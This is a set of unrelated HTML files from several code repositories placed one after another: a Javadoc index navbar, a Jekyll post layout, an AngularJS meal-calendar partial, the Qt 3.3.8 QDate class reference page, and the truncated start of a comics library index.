href="index-2.html">B</a>&nbsp;<a href="index-3.html">C</a>&nbsp;<a href="index-4.html">D</a>&nbsp;<a href="index-5.html">E</a>&nbsp;<a href="index-6.html">F</a>&nbsp;<a href="index-7.html">G</a>&nbsp;<a href="index-8.html">H</a>&nbsp;<a href="index-9.html">I</a>&nbsp;<a href="index-10.html">L</a>&nbsp;<a href="index-11.html">M</a>&nbsp;<a href="index-12.html">N</a>&nbsp;<a href="index-13.html">O</a>&nbsp;<a href="index-14.html">P</a>&nbsp;<a href="index-15.html">R</a>&nbsp;<a href="index-16.html">S</a>&nbsp;<a href="index-17.html">T</a>&nbsp;<a href="index-18.html">U</a>&nbsp;</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li>Use</li> <li><a href="../overview-tree.html">Tree</a></li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li class="navBarCell1Rev">Index</li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="index-3.html">Prev Letter</a></li> <li><a href="index-5.html">Next Letter</a></li> </ul> <ul class="navList"> <li><a href="../index.html?index-filesindex-4.html" target="_top">Frames</a></li> <li><a href="index-4.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
_layouts/post.html
18mr/keepushome
--- layout: default --- <div class="post"> <header class="post-header"> <h1 class="post-title">{{ page.title }}</h1> <p class="post-meta">{{ page.date | date: "%b %-d, %Y" }}{% if page.author %} • {{ page.author }}{% endif %}{% if page.meta %} • {{ page.meta }}{% endif %}</p> </header> <article class="post-content"> {% if page.featured-image %} <img src="{{ page.featured-image }}"> {% if page.featured-caption %} <span class="caption">{{ page.featured-caption }}</span> {% endif %} {% endif %} {{ content }} </article> {% include share.html %} </div>
views/partials/calendarMain.html
GrubsUp/Grubs-Up
<div ng-include src="'includes/header'"></div> <div class="container"> <br> <div class="row"> <div class="col-xl-12"> <div class="content" ng-show="user"> <table class="table table-bordered"> <thead> <tr> <th>Day</th> <th>Mon</th> <th>Tue</th> <th>Wed</th> <th>Thu</th> <th>Fri</th> <th>Sat</th> <th>Sun</th> </tr> </thead> <tbody> <tr ng-repeat="week in [1,2,3,4,5]"> <td ng-repeat="day in [1,2,3,4,5,6,7]"> <h3>{{($index+1)+(7*($parent.$index))}}</h3> <div class="container"> <div class="row"> Cereal </div> <div class="row"> Eating Out </div> <div class="row"> Pizza </div> </div> </td> </tr> </tbody> </table> </div> </div> </div> </div>
doc/html/qdate.html
epatel/qt-mac-free-3.3.8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- /home/espenr/tmp/qt-3.3.8-espenr-2499/qt-mac-free-3.3.8/src/tools/qdatetime.cpp:201 --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>QDate Class</title> <style type="text/css"><!-- fn { margin-left: 1cm; text-indent: -1cm; } a:link { color: #004faf; text-decoration: none } a:visited { color: #672967; text-decoration: none } body { background: #ffffff; color: black; } --></style> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr bgcolor="#E5E5E5"> <td valign=center> <a href="index.html"> <font color="#004faf">Home</font></a> | <a href="classes.html"> <font color="#004faf">All&nbsp;Classes</font></a> | <a href="mainclasses.html"> <font color="#004faf">Main&nbsp;Classes</font></a> | <a href="annotated.html"> <font color="#004faf">Annotated</font></a> | <a href="groups.html"> <font color="#004faf">Grouped&nbsp;Classes</font></a> | <a href="functions.html"> <font color="#004faf">Functions</font></a> </td> <td align="right" valign="center"><img src="logo32.png" align="right" width="64" height="32" border="0"></td></tr></table><h1 align=center>QDate Class Reference</h1> <p>The QDate class provides date functions. <a href="#details">More...</a> <p>All the functions in this class are <a href="threads.html#reentrant">reentrant</a> when Qt is built with thread support.</p> <p><tt>#include &lt;<a href="qdatetime-h.html">qdatetime.h</a>&gt;</tt> <p><a href="qdate-members.html">List of all member functions.</a> <h2>Public Members</h2> <ul> <li class=fn><a href="#QDate"><b>QDate</b></a> ()</li> <li class=fn><a href="#QDate-2"><b>QDate</b></a> ( int&nbsp;y, int&nbsp;m, int&nbsp;d )</li> <li class=fn>bool <a href="#isNull"><b>isNull</b></a> () const</li> <li class=fn>bool <a href="#isValid"><b>isValid</b></a> () const</li> <li class=fn>int <a href="#year"><b>year</b></a> () const</li> <li class=fn>int <a href="#month"><b>month</b></a> () const</li> <li class=fn>int <a href="#day"><b>day</b></a> () const</li> <li class=fn>int <a href="#dayOfWeek"><b>dayOfWeek</b></a> () const</li> <li class=fn>int <a href="#dayOfYear"><b>dayOfYear</b></a> () const</li> <li class=fn>int <a href="#daysInMonth"><b>daysInMonth</b></a> () const</li> <li class=fn>int <a href="#daysInYear"><b>daysInYear</b></a> () const</li> <li class=fn>int <a href="#weekNumber"><b>weekNumber</b></a> ( int&nbsp;*&nbsp;yearNumber = 0 ) const</li> <li class=fn>QString <a href="#toString-2"><b>toString</b></a> ( Qt::DateFormat&nbsp;f = Qt::TextDate ) const</li> <li class=fn>QString <a href="#toString"><b>toString</b></a> ( const&nbsp;QString&nbsp;&amp;&nbsp;format ) const</li> <li class=fn>bool <a href="#setYMD"><b>setYMD</b></a> ( int&nbsp;y, int&nbsp;m, int&nbsp;d )</li> <li class=fn>QDate <a href="#addDays"><b>addDays</b></a> ( int&nbsp;ndays ) const</li> <li class=fn>QDate <a href="#addMonths"><b>addMonths</b></a> ( int&nbsp;nmonths ) const</li> <li class=fn>QDate <a href="#addYears"><b>addYears</b></a> ( int&nbsp;nyears ) const</li> <li class=fn>int <a href="#daysTo"><b>daysTo</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> <li class=fn>bool <a href="#operator-eq-eq"><b>operator==</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> <li class=fn>bool <a href="#operator!-eq"><b>operator!=</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> <li class=fn>bool <a href="#operator-lt"><b>operator&lt;</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> <li class=fn>bool <a href="#operator-lt-eq"><b>operator&lt;=</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> <li class=fn>bool <a href="#operator-gt"><b>operator&gt;</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> <li class=fn>bool <a href="#operator-gt-eq"><b>operator&gt;=</b></a> ( const&nbsp;QDate&nbsp;&amp;&nbsp;d ) const</li> </ul> <h2>Static Public Members</h2> <ul> <li class=fn>QString monthName ( int&nbsp;month ) &nbsp;<em>(obsolete)</em></li> <li class=fn>QString dayName ( int&nbsp;weekday ) &nbsp;<em>(obsolete)</em></li> <li class=fn>QString <a href="#shortMonthName"><b>shortMonthName</b></a> ( int&nbsp;month )</li> <li class=fn>QString <a href="#shortDayName"><b>shortDayName</b></a> ( int&nbsp;weekday )</li> <li class=fn>QString <a href="#longMonthName"><b>longMonthName</b></a> ( int&nbsp;month )</li> <li class=fn>QString <a href="#longDayName"><b>longDayName</b></a> ( int&nbsp;weekday )</li> <li class=fn>QDate <a href="#currentDate-2"><b>currentDate</b></a> ()</li> <li class=fn>QDate <a href="#currentDate"><b>currentDate</b></a> ( Qt::TimeSpec&nbsp;ts )</li> <li class=fn>QDate <a href="#fromString"><b>fromString</b></a> ( const&nbsp;QString&nbsp;&amp;&nbsp;s, Qt::DateFormat&nbsp;f = Qt::TextDate )</li> <li class=fn>bool <a href="#isValid-2"><b>isValid</b></a> ( int&nbsp;y, int&nbsp;m, int&nbsp;d )</li> <li class=fn>bool <a href="#leapYear"><b>leapYear</b></a> ( int&nbsp;y )</li> </ul> <h2>Related Functions</h2> <ul> <li class=fn>QDataStream &amp; <a href="#operator-lt-lt"><b>operator&lt;&lt;</b></a> ( QDataStream&nbsp;&amp;&nbsp;s, const&nbsp;QDate&nbsp;&amp;&nbsp;d )</li> <li class=fn>QDataStream &amp; <a href="#operator-gt-gt"><b>operator&gt;&gt;</b></a> ( QDataStream&nbsp;&amp;&nbsp;s, QDate&nbsp;&amp;&nbsp;d )</li> </ul> <hr><a name="details"></a><h2>Detailed Description</h2> The QDate class provides date functions. <p> <p> A QDate object contains a calendar date, i.e. year, month, and day numbers, in the modern Western (Gregorian) calendar. It can read the current date from the system clock. It provides functions for comparing dates and for manipulating dates, e.g. by adding a number of days or months or years. <p> A QDate object is typically created either by giving the year, month and day numbers explicitly, or by using the static function <a href="#currentDate">currentDate</a>(), which creates a QDate object containing the system clock's date. An explicit date can also be set using <a href="#setYMD">setYMD</a>(). The <a href="#fromString">fromString</a>() function returns a QDate given a string and a date format which is used to interpret the date within the string. <p> The <a href="#year">year</a>(), <a href="#month">month</a>(), and <a href="#day">day</a>() functions provide access to the year, month, and day numbers. Also, <a href="#dayOfWeek">dayOfWeek</a>() and <a href="#dayOfYear">dayOfYear</a>() functions are provided. The same information is provided in textual format by the <a href="#toString">toString</a>(), <a href="#shortDayName">shortDayName</a>(), <a href="#longDayName">longDayName</a>(), <a href="#shortMonthName">shortMonthName</a>() and <a href="#longMonthName">longMonthName</a>() functions. <p> QDate provides a full set of operators to compare two QDate objects where smaller means earlier and larger means later. <p> You can increment (or decrement) a date by a given number of days using <a href="#addDays">addDays</a>(). Similarly you can use <a href="#addMonths">addMonths</a>() and <a href="#addYears">addYears</a>(). The <a href="#daysTo">daysTo</a>() function returns the number of days between two dates. <p> The <a href="#daysInMonth">daysInMonth</a>() and <a href="#daysInYear">daysInYear</a>() functions return how many days there are in this date's month and year, respectively. The <a href="#leapYear">leapYear</a>() function indicates whether this date is in a leap year. <p> Note that QDate should not be used for date calculations for dates prior to the introduction of the Gregorian calendar. This calendar was adopted by England from the 14<sup><small>th</small></sup> September 1752 (hence this is the earliest valid QDate), and subsequently by most other Western countries, until 1923. <p> The end of time is reached around the year 8000, by which time we expect Qt to be obsolete. <p> <p>See also <a href="qtime.html">QTime</a>, <a href="qdatetime.html">QDateTime</a>, <a href="qdateedit.html">QDateEdit</a>, <a href="qdatetimeedit.html">QDateTimeEdit</a>, and <a href="time.html">Time and Date</a>. <hr><h2>Member Function Documentation</h2> <h3 class=fn><a name="QDate"></a>QDate::QDate () </h3> <p> Constructs a null date. Null dates are invalid. <p> <p>See also <a href="#isNull">isNull</a>() and <a href="#isValid">isValid</a>(). <h3 class=fn><a name="QDate-2"></a>QDate::QDate ( int&nbsp;y, int&nbsp;m, int&nbsp;d ) </h3> Constructs a date with year <em>y</em>, month <em>m</em> and day <em>d</em>. <p> <em>y</em> must be in the range 1752..8000, <em>m</em> must be in the range 1..12, and <em>d</em> must be in the range 1..31. <p> <b>Warning:</b> If <em>y</em> is in the range 0..99, it is interpreted as 1900..1999. <p> <p>See also <a href="#isValid">isValid</a>(). <h3 class=fn><a href="qdate.html">QDate</a> <a name="addDays"></a>QDate::addDays ( int&nbsp;ndays ) const </h3> Returns a QDate object containing a date <em>ndays</em> later than the date of this object (or earlier if <em>ndays</em> is negative). <p> <p>See also <a href="#addMonths">addMonths</a>(), <a href="#addYears">addYears</a>(), and <a href="#daysTo">daysTo</a>(). <h3 class=fn><a href="qdate.html">QDate</a> <a name="addMonths"></a>QDate::addMonths ( int&nbsp;nmonths ) const </h3> Returns a QDate object containing a date <em>nmonths</em> later than the date of this object (or earlier if <em>nmonths</em> is negative). <p> <p>See also <a href="#addDays">addDays</a>() and <a href="#addYears">addYears</a>(). <h3 class=fn><a href="qdate.html">QDate</a> <a name="addYears"></a>QDate::addYears ( int&nbsp;nyears ) const </h3> Returns a QDate object containing a date <em>nyears</em> later than the date of this object (or earlier if <em>nyears</em> is negative). <p> <p>See also <a href="#addDays">addDays</a>() and <a href="#addMonths">addMonths</a>(). <h3 class=fn><a href="qdate.html">QDate</a> <a name="currentDate"></a>QDate::currentDate ( <a href="qt.html#TimeSpec-enum">Qt::TimeSpec</a>&nbsp;ts )<tt> [static]</tt> </h3> Returns the current date, as reported by the system clock, for the TimeSpec <em>ts</em>. The default TimeSpec is LocalTime. <p> <p>See also <a href="qtime.html#currentTime">QTime::currentTime</a>(), <a href="qdatetime.html#currentDateTime">QDateTime::currentDateTime</a>(), and <a href="qt.html#TimeSpec-enum">Qt::TimeSpec</a>. <p>Example: <a href="dclock-example.html#x1098">dclock/dclock.cpp</a>. <h3 class=fn><a href="qdate.html">QDate</a> <a name="currentDate-2"></a>QDate::currentDate ()<tt> [static]</tt> </h3> This is an overloaded member function, provided for convenience. It behaves essentially like the above function. <p> Returns the current date, as reported by the system clock. <p> <p>See also <a href="qtime.html#currentTime">QTime::currentTime</a>() and <a href="qdatetime.html#currentDateTime">QDateTime::currentDateTime</a>(). <h3 class=fn>int <a name="day"></a>QDate::day () const </h3> Returns the day of the month (1..31) of this date. <p> <p>See also <a href="#year">year</a>(), <a href="#month">month</a>(), and <a href="#dayOfWeek">dayOfWeek</a>(). <p>Example: <a href="dclock-example.html#x1099">dclock/dclock.cpp</a>. <h3 class=fn><a href="qstring.html">QString</a> <a name="dayName"></a>QDate::dayName ( int&nbsp;weekday )<tt> [static]</tt> </h3> <b>This function is obsolete.</b> It is provided to keep old source working. We strongly advise against using it in new code. <p> Use <a href="#shortDayName">shortDayName</a>() instead. <h3 class=fn>int <a name="dayOfWeek"></a>QDate::dayOfWeek () const </h3> Returns the weekday (Monday=1..Sunday=7) for this date. <p> <p>See also <a href="#day">day</a>() and <a href="#dayOfYear">dayOfYear</a>(). <h3 class=fn>int <a name="dayOfYear"></a>QDate::dayOfYear () const </h3> Returns the day of the year (1..365) for this date. <p> <p>See also <a href="#day">day</a>() and <a href="#dayOfWeek">dayOfWeek</a>(). <h3 class=fn>int <a name="daysInMonth"></a>QDate::daysInMonth () const </h3> Returns the number of days in the month (28..31) for this date. <p> <p>See also <a href="#day">day</a>() and <a href="#daysInYear">daysInYear</a>(). <h3 class=fn>int <a name="daysInYear"></a>QDate::daysInYear () const </h3> Returns the number of days in the year (365 or 366) for this date. <p> <p>See also <a href="#day">day</a>() and <a href="#daysInMonth">daysInMonth</a>(). <h3 class=fn>int <a name="daysTo"></a>QDate::daysTo ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> Returns the number of days from this date to <em>d</em> (which is negative if <em>d</em> is earlier than this date). <p> Example: <pre> QDate d1( 1995, 5, 17 ); // May 17th 1995 QDate d2( 1995, 5, 20 ); // May 20th 1995 d1.<a href="#daysTo">daysTo</a>( d2 ); // returns 3 d2.<a href="#daysTo">daysTo</a>( d1 ); // returns -3 </pre> <p> <p>See also <a href="#addDays">addDays</a>(). <h3 class=fn><a href="qdate.html">QDate</a> <a name="fromString"></a>QDate::fromString ( const&nbsp;<a href="qstring.html">QString</a>&nbsp;&amp;&nbsp;s, <a href="qt.html#DateFormat-enum">Qt::DateFormat</a>&nbsp;f = Qt::TextDate )<tt> [static]</tt> </h3> Returns the QDate represented by the string <em>s</em>, using the format <em>f</em>, or an invalid date if the string cannot be parsed. <p> Note for <a href="qt.html#DateFormat-enum">Qt::TextDate</a>: It is recommended that you use the English short month names (e.g. "Jan"). Although localized month names can also be used, they depend on the user's locale settings. <p> <b>Warning:</b> <a href="qt.html#DateFormat-enum">Qt::LocalDate</a> cannot be used here. <h3 class=fn>bool <a name="isNull"></a>QDate::isNull () const </h3> <p> Returns TRUE if the date is null; otherwise returns FALSE. A null date is invalid. <p> <p>See also <a href="#isValid">isValid</a>(). <h3 class=fn>bool <a name="isValid"></a>QDate::isValid () const </h3> Returns TRUE if this date is valid; otherwise returns FALSE. <p> <p>See also <a href="#isNull">isNull</a>(). <h3 class=fn>bool <a name="isValid-2"></a>QDate::isValid ( int&nbsp;y, int&nbsp;m, int&nbsp;d )<tt> [static]</tt> </h3> This is an overloaded member function, provided for convenience. It behaves essentially like the above function. <p> Returns TRUE if the specified date (year <em>y</em>, month <em>m</em> and day <em>d</em>) is valid; otherwise returns FALSE. <p> Example: <pre> QDate::<a href="#isValid">isValid</a>( 2002, 5, 17 ); // TRUE May 17th 2002 is valid QDate::<a href="#isValid">isValid</a>( 2002, 2, 30 ); // FALSE Feb 30th does not exist QDate::<a href="#isValid">isValid</a>( 2004, 2, 29 ); // TRUE 2004 is a leap year QDate::<a href="#isValid">isValid</a>( 1202, 6, 6 ); // FALSE 1202 is pre-Gregorian </pre> <p> <b>Warning:</b> A <em>y</em> value in the range 00..99 is interpreted as 1900..1999. <p> <p>See also <a href="#isNull">isNull</a>() and <a href="#setYMD">setYMD</a>(). <h3 class=fn>bool <a name="leapYear"></a>QDate::leapYear ( int&nbsp;y )<tt> [static]</tt> </h3> Returns TRUE if the specified year <em>y</em> is a leap year; otherwise returns FALSE. <h3 class=fn><a href="qstring.html">QString</a> <a name="longDayName"></a>QDate::longDayName ( int&nbsp;weekday )<tt> [static]</tt> </h3> Returns the long name of the <em>weekday</em>. <p> 1 = "Monday", 2 = "Tuesday", ... 7 = "Sunday" <p> The day names will be localized according to the system's locale settings. <p> <p>See also <a href="#toString">toString</a>(), <a href="#shortDayName">shortDayName</a>(), <a href="#shortMonthName">shortMonthName</a>(), and <a href="#longMonthName">longMonthName</a>(). <h3 class=fn><a href="qstring.html">QString</a> <a name="longMonthName"></a>QDate::longMonthName ( int&nbsp;month )<tt> [static]</tt> </h3> Returns the long name of the <em>month</em>. <p> 1 = "January", 2 = "February", ... 12 = "December" <p> The month names will be localized according to the system's locale settings. <p> <p>See also <a href="#toString">toString</a>(), <a href="#shortMonthName">shortMonthName</a>(), <a href="#shortDayName">shortDayName</a>(), and <a href="#longDayName">longDayName</a>(). <h3 class=fn>int <a name="month"></a>QDate::month () const </h3> Returns the month (January=1..December=12) of this date. <p> <p>See also <a href="#year">year</a>() and <a href="#day">day</a>(). <p>Example: <a href="dclock-example.html#x1100">dclock/dclock.cpp</a>. <h3 class=fn><a href="qstring.html">QString</a> <a name="monthName"></a>QDate::monthName ( int&nbsp;month )<tt> [static]</tt> </h3> <b>This function is obsolete.</b> It is provided to keep old source working. We strongly advise against using it in new code. <p> Use <a href="#shortMonthName">shortMonthName</a>() instead. <h3 class=fn>bool <a name="operator!-eq"></a>QDate::operator!= ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> <p> Returns TRUE if this date is different from <em>d</em>; otherwise returns FALSE. <h3 class=fn>bool <a name="operator-lt"></a>QDate::operator&lt; ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> <p> Returns TRUE if this date is earlier than <em>d</em>, otherwise returns FALSE. <h3 class=fn>bool <a name="operator-lt-eq"></a>QDate::operator&lt;= ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> <p> Returns TRUE if this date is earlier than or equal to <em>d</em>, otherwise returns FALSE. <h3 class=fn>bool <a name="operator-eq-eq"></a>QDate::operator== ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> <p> Returns TRUE if this date is equal to <em>d</em>; otherwise returns FALSE. <h3 class=fn>bool <a name="operator-gt"></a>QDate::operator&gt; ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> <p> Returns TRUE if this date is later than <em>d</em>, otherwise returns FALSE. <h3 class=fn>bool <a name="operator-gt-eq"></a>QDate::operator&gt;= ( const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) const </h3> <p> Returns TRUE if this date is later than or equal to <em>d</em>, otherwise returns FALSE. <h3 class=fn>bool <a name="setYMD"></a>QDate::setYMD ( int&nbsp;y, int&nbsp;m, int&nbsp;d ) </h3> Sets the date's year <em>y</em>, month <em>m</em> and day <em>d</em>. <p> <em>y</em> must be in the range 1752..8000, <em>m</em> must be in the range 1..12, and <em>d</em> must be in the range 1..31. <p> <b>Warning:</b> If <em>y</em> is in the range 0..99, it is interpreted as 1900..1999. <p> Returns TRUE if the date is valid; otherwise returns FALSE. <h3 class=fn><a href="qstring.html">QString</a> <a name="shortDayName"></a>QDate::shortDayName ( int&nbsp;weekday )<tt> [static]</tt> </h3> Returns the name of the <em>weekday</em>. <p> 1 = "Mon", 2 = "Tue", ... 7 = "Sun" <p> The day names will be localized according to the system's locale settings. <p> <p>See also <a href="#toString">toString</a>(), <a href="#shortMonthName">shortMonthName</a>(), <a href="#longMonthName">longMonthName</a>(), and <a href="#longDayName">longDayName</a>(). <h3 class=fn><a href="qstring.html">QString</a> <a name="shortMonthName"></a>QDate::shortMonthName ( int&nbsp;month )<tt> [static]</tt> </h3> Returns the name of the <em>month</em>. <p> 1 = "Jan", 2 = "Feb", ... 12 = "Dec" <p> The month names will be localized according to the system's locale settings. <p> <p>See also <a href="#toString">toString</a>(), <a href="#longMonthName">longMonthName</a>(), <a href="#shortDayName">shortDayName</a>(), and <a href="#longDayName">longDayName</a>(). <h3 class=fn><a href="qstring.html">QString</a> <a name="toString"></a>QDate::toString ( const&nbsp;<a href="qstring.html">QString</a>&nbsp;&amp;&nbsp;format ) const </h3> Returns the date as a string. The <em>format</em> parameter determines the format of the result string. <p> These expressions may be used: <p> <center><table cellpadding="4" cellspacing="2" border="0"> <tr bgcolor="#a2c511"> <th valign="top">Expression <th valign="top">Output <tr bgcolor="#f0f0f0"> <td valign="top">d <td valign="top">the day as number without a leading zero (1-31) <tr bgcolor="#d0d0d0"> <td valign="top">dd <td valign="top">the day as number with a leading zero (01-31) <tr bgcolor="#f0f0f0"> <td valign="top">ddd <td valign="top">the abbreviated localized day name (e.g. 'Mon'..'Sun'). Uses <a href="#shortDayName">QDate::shortDayName</a>(). <tr bgcolor="#d0d0d0"> <td valign="top">dddd <td valign="top">the long localized day name (e.g. 'Monday'..'Sunday'). Uses <a href="#longDayName">QDate::longDayName</a>(). <tr bgcolor="#f0f0f0"> <td valign="top">M <td valign="top">the month as number without a leading zero (1-12) <tr bgcolor="#d0d0d0"> <td valign="top">MM <td valign="top">the month as number with a leading zero (01-12) <tr bgcolor="#f0f0f0"> <td valign="top">MMM <td valign="top">the abbreviated localized month name (e.g. 'Jan'..'Dec'). Uses <a href="#shortMonthName">QDate::shortMonthName</a>(). <tr bgcolor="#d0d0d0"> <td valign="top">MMMM <td valign="top">the long localized month name (e.g. 'January'..'December'). Uses <a href="#longMonthName">QDate::longMonthName</a>(). <tr bgcolor="#f0f0f0"> <td valign="top">yy <td valign="top">the year as two digit number (00-99) <tr bgcolor="#d0d0d0"> <td valign="top">yyyy <td valign="top">the year as four digit number (1752-8000) </table></center> <p> All other input characters will be ignored. <p> Example format strings (assuming that the QDate is the 20<sup><small>th</small></sup> July 1969): <center><table cellpadding="4" cellspacing="2" border="0"> <tr bgcolor="#a2c511"> <th valign="top">Format <th valign="top">Result <tr bgcolor="#f0f0f0"> <td valign="top">dd.MM.yyyy <td valign="top" colspan="1" rowspan="1"> 20.07.1969 <tr bgcolor="#d0d0d0"> <td valign="top">ddd MMMM d yy <td valign="top" colspan="1" rowspan="1"> Sun July 20 69 </table></center> <p> If the date is an invalid date, then <a href="qstring.html#QString-null">QString::null</a> will be returned. <p> <p>See also <a href="qdatetime.html#toString">QDateTime::toString</a>() and <a href="qtime.html#toString">QTime::toString</a>(). <p> <h3 class=fn><a href="qstring.html">QString</a> <a name="toString-2"></a>QDate::toString ( <a href="qt.html#DateFormat-enum">Qt::DateFormat</a>&nbsp;f = Qt::TextDate ) const </h3> This is an overloaded member function, provided for convenience. It behaves essentially like the above function. <p> Returns the date as a string. The <em>f</em> parameter determines the format of the string. <p> If <em>f</em> is <a href="qt.html#DateFormat-enum">Qt::TextDate</a>, the string format is "Sat May 20 1995" (using the <a href="#shortDayName">shortDayName</a>() and <a href="#shortMonthName">shortMonthName</a>() functions to generate the string, so the day and month names are locale specific). <p> If <em>f</em> is <a href="qt.html#DateFormat-enum">Qt::ISODate</a>, the string format corresponds to the ISO 8601 specification for representations of dates, which is YYYY-MM-DD where YYYY is the year, MM is the month of the year (between 01 and 12), and DD is the day of the month between 01 and 31. <p> If <em>f</em> is <a href="qt.html#DateFormat-enum">Qt::LocalDate</a>, the string format depends on the locale settings of the system. <p> If the date is an invalid date, then <a href="qstring.html#QString-null">QString::null</a> will be returned. <p> <p>See also <a href="#shortDayName">shortDayName</a>() and <a href="#shortMonthName">shortMonthName</a>(). <h3 class=fn>int <a name="weekNumber"></a>QDate::weekNumber ( int&nbsp;*&nbsp;yearNumber = 0 ) const </h3> Returns the week number (1 to 53), and stores the year in <em>*yearNumber</em> unless <em>yearNumber</em> is null (the default). <p> Returns 0 if the date is invalid. <p> In accordance with ISO 8601, weeks start on Monday and the first Thursday of a year is always in week 1 of that year. Most years have 52 weeks, but some have 53. <p> <em>*yearNumber</em> is not always the same as <a href="#year">year</a>(). For example, 1 January 2000 has week number 52 in the year 1999, and 31 December 2002 has week number 1 in the year 2003. <p> <p> Copyright (c) 1989 The Regents of the University of California. All rights reserved. <p> Redistribution and use in source and binary forms are permitted provided that the above copyright notice and this paragraph are duplicated in all such forms and that any documentation, advertising materials, and other materials related to such distribution and use acknowledge that the software was developed by the University of California, Berkeley. The name of the University may not be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. <p> <p>See also <a href="#isValid">isValid</a>(). <h3 class=fn>int <a name="year"></a>QDate::year () const </h3> Returns the year (1752..8000) of this date. <p> <p>See also <a href="#month">month</a>() and <a href="#day">day</a>(). <hr><h2>Related Functions</h2> <h3 class=fn><a href="qdatastream.html">QDataStream</a>&nbsp;&amp; <a name="operator-lt-lt"></a>operator&lt;&lt; ( <a href="qdatastream.html">QDataStream</a>&nbsp;&amp;&nbsp;s, const&nbsp;<a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) </h3> <p> Writes the date, <em>d</em>, to the data stream, <em>s</em>. <p> <p>See also <a href="datastreamformat.html">Format of the QDataStream operators</a>. <h3 class=fn><a href="qdatastream.html">QDataStream</a>&nbsp;&amp; <a name="operator-gt-gt"></a>operator&gt;&gt; ( <a href="qdatastream.html">QDataStream</a>&nbsp;&amp;&nbsp;s, <a href="qdate.html">QDate</a>&nbsp;&amp;&nbsp;d ) </h3> <p> Reads a date from the stream <em>s</em> into <em>d</em>. <p> <p>See also <a href="datastreamformat.html">Format of the QDataStream operators</a>. <!-- eof --> <hr><p> This file is part of the <a href="index.html">Qt toolkit</a>. Copyright &copy; 1995-2007 <a href="http://www.trolltech.com/">Trolltech</a>. All Rights Reserved.<p><address><hr><div align=center> <table width=100% cellspacing=0 border=0><tr> <td>Copyright &copy; 2007 <a href="troll.html">Trolltech</a><td align=center><a href="trademarks.html">Trademarks</a> <td align=right><div align=right>Qt 3.3.8</div> </table></div></address></body> </html>
assets/comics/Library/index93.html
MiniSEC/MiniSEC.github.io
<html> <HEAD> <LINK REL="StyleSheet" TYPE="text/css" HREF="exportindex_item_customlist.css"></LINK> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <TITLE>My Library</TITLE> </HEAD> <BODY> <div align="center"> <span class="title">My Library</span> <div class="navigation" align="center"> <div class="navigationline"> <div class="navlink"> <a href="index.html">1</a> </div> <div class="navlink"> <a href="index1.html">2</a> </div> <div class="navlink"> <a href="index2.html">3</a> </div> <div class="navlink"> <a href="index3.html">4</a> </div> <div class="navlink"> <a href="index4.html">5</a> </div> <div class="navlink"> <a href="index5.html">6</a> </div> <div class="navlink"> <a href="index6.html">7</a> </div> <div class="navlink"> <a href="index7.html">8</a> </div> <div class="navlink"> <a href="index8.html">9</a> </div> <div class="navlink"> <a href="index9.html">10</a> </div> <div class="navlink"> <a href="index10.html">11</a> </div> <div class="navlink"> <a href="index11.html">12</a> </div> <div class="navlink"> <a href="index12.html">13</a> </div> <div class="navlink"> <a href="index13.html">14</a> </div> <div class="navlink"> <a href="index14.html">15</a> </div> <div class="navlink"> <a href="index15.html">16</a> </div> <div class="navlink"> <a href="index16.html">17</a> </div> <div class="navlink"> <a href="index17.html">18</a> </div> <div class="navlink"> <a href="index18.html">19</a> </div> <div class="navlink"> <a href="index19.html">20</a> </div> <div class="navlink"> <a href="index20.html">21</a> </div> <div class="navlink"> <a href="index21.html">22</a> </div> <div class="navlink"> <a href="index22.html">23</a> </div> <div class="navlink"> <a href="index23.html">24</a> </div> <div class="navlink"> <a href="index24.html">25</a> </div> <div class="navlink"> <a href="index25.html">26</a> </div> <div class="navlink"> <a href="index26.html">27</a> </div> <div class="navlink"> <a href="index27.html">28</a> </div> <div class="navlink"> <a href="index28.html">29</a> </div> <div class="navlink"> <a href="index29.html">30</a> </div> <div class="navlink"> <a href="index30.html">31</a> </div> <div class="navlink"> <a href="index31.html">32</a> </div> <div class="navlink"> <a href="index32.html">33</a> </div> <div class="navlink"> <a href="index33.html">34</a> </div> <div class="navlink"> <a href="index34.html">35</a> </div> 